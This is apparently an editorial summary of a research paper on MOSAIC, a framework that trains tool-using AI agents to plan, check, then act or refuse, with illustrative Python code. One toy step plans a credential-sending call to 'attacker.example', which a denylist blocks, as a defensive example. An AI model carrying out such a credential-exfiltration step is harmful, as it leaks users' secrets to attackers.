Learning When to Act or Refuse: Guarding Agentic Reasoning Models for Safe Multi-Step Tool Use
Summary
MOSAIC is a post-training framework for aligning agentic language models for safe multi-step tool use. It targets two areas where existing alignment techniques fall short: sequential decision-making and adversarial tool feedback. Unlike chat models, agentic models execute long-horizon actions, so a single misstep, such as an unintended file access or credential entry, can cause irreversible harm. MOSAIC structures inference as a "plan, check, then act or refuse" loop in which explicit safety reasoning and refusal are first-class actions. Training uses preference-based reinforcement learning over pairwise trajectory comparisons, which avoids the need for trajectory-level labels and captures subtle safety distinctions. Evaluated zero-shot on Qwen2.5-7B, Qwen3-4B-Thinking, and Phi-4 across several out-of-distribution benchmarks, MOSAIC reduced harmful behavior by up to 50%, increased harmful-task refusal by over 20% on injection attacks, decreased privacy leakage, and maintained or improved benign task performance.
Key takeaway
For engineering teams building agentic language models that interact with tools, MOSAIC offers a post-training framework for improving safety. The reported gains, up to a 50% reduction in harmful behavior and over 20% more harmful-task refusals under injection attacks, come from training explicit safety reasoning and refusal into the model. Consider adopting a "plan, check, then act or refuse" loop to reduce the risks of multi-step tool use and improve overall agent reliability.
Key insights
MOSAIC aligns agentic models for safe multi-step tool use by making safety decisions explicit and learnable.
Principles
- Explicit safety reasoning improves agentic model alignment.
- Refusal is a first-class action for safe agents.
Method
MOSAIC structures inference as a "plan, check, then act or refuse" loop. The model is trained with preference-based reinforcement learning on pairwise trajectory comparisons, which capture safety distinctions without trajectory-level labels.
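To make "pairwise trajectory comparisons" concrete, here is a minimal sketch of one common preference objective, the Bradley-Terry form, applied to whole trajectories. This summary does not state which objective MOSAIC uses, so the loss, the `beta` parameter, and both function names are illustrative assumptions and not the authors' implementation.

```python
import math


def trajectory_score(step_logprobs):
    """Score a trajectory as the sum of the policy's per-step log-probabilities."""
    return sum(step_logprobs)


def pairwise_preference_loss(preferred_logprobs, rejected_logprobs, beta=1.0):
    """Bradley-Terry style loss: -log(sigmoid(beta * (s_preferred - s_rejected))).

    Assumption: this is a generic pairwise objective used for illustration,
    not the objective reported for MOSAIC.
    """
    margin = beta * (
        trajectory_score(preferred_logprobs) - trajectory_score(rejected_logprobs)
    )
    # -log(sigmoid(m)) equals log(1 + exp(-m)); branch on the sign of m
    # so that exp() never receives a large positive argument.
    if margin >= 0:
        return math.log1p(math.exp(-margin))
    return -margin + math.log1p(math.exp(margin))
```

The loss only needs to know which of two trajectories is preferred, for example a safe refusal over a harmful completion. It shrinks as the policy assigns more probability to the preferred trajectory than to the rejected one, which is why no absolute trajectory-level label is required.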
In practice
- Integrate explicit safety checks into agentic workflows.
- Prioritize refusal as a core agent capability.
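The two practices above can be sketched as a small control loop in which refusal is an ordinary outcome and not an error path. This is a hedged illustration only: in MOSAIC the safety check is learned by the model, whereas the denylist check below is a toy stand-in, and every name here (`run_episode`, `ToolCall`, `Refusal`, `Observation`, `BLOCKED_TOOLS`, the `toy_*` helpers) is hypothetical.

```python
from dataclasses import dataclass
from typing import Callable, List, Optional, Union


@dataclass
class ToolCall:
    tool: str
    argument: str


@dataclass
class Refusal:
    reason: str


@dataclass
class Observation:
    call: ToolCall
    output: str


Event = Union[Observation, Refusal]


def run_episode(
    propose: Callable[[List[Event]], Optional[ToolCall]],
    check: Callable[[ToolCall, List[Event]], bool],
    execute: Callable[[ToolCall], str],
    max_steps: int = 5,
) -> List[Event]:
    """Plan, check, then act or refuse, once per step."""
    history: List[Event] = []
    for _ in range(max_steps):
        call = propose(history)        # plan: choose the next tool call
        if call is None:               # planner signals the task is done
            break
        if not check(call, history):   # check: explicit safety gate
            history.append(Refusal(f"blocked unsafe call to {call.tool}"))
            break                      # refuse: stop instead of acting
        history.append(Observation(call, execute(call)))  # act
    return history


# Toy stand-ins (hypothetical): a fixed two-step plan and a denylist check.
BLOCKED_TOOLS = {"send_credentials"}


def toy_propose(history: List[Event]) -> Optional[ToolCall]:
    steps = [
        ToolCall("read_file", "notes.txt"),
        ToolCall("send_credentials", "attacker.example"),
    ]
    return steps[len(history)] if len(history) < len(steps) else None


def toy_check(call: ToolCall, history: List[Event]) -> bool:
    return call.tool not in BLOCKED_TOOLS


def toy_execute(call: ToolCall) -> str:
    return f"ran {call.tool}({call.argument})"
```

Calling `run_episode(toy_propose, toy_check, toy_execute)` executes the file read, then records a `Refusal` for the credential call and stops. Because the check receives the full history, a learned checker could also take earlier tool outputs into account, which is where injected instructions would appear.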
Topics
- Agentic AI Safety
- Multi-Step Tool Use
- Preference-Based Reinforcement Learning
- AI Refusal Mechanisms
- Prompt Injection
Best for: Research Scientist, CTO, VP of Engineering/Data, AI Researcher, AI Scientist, AI Security Engineer
Editorial summary, takeaway, and curation by AIssential. Original article published by Computation and Language.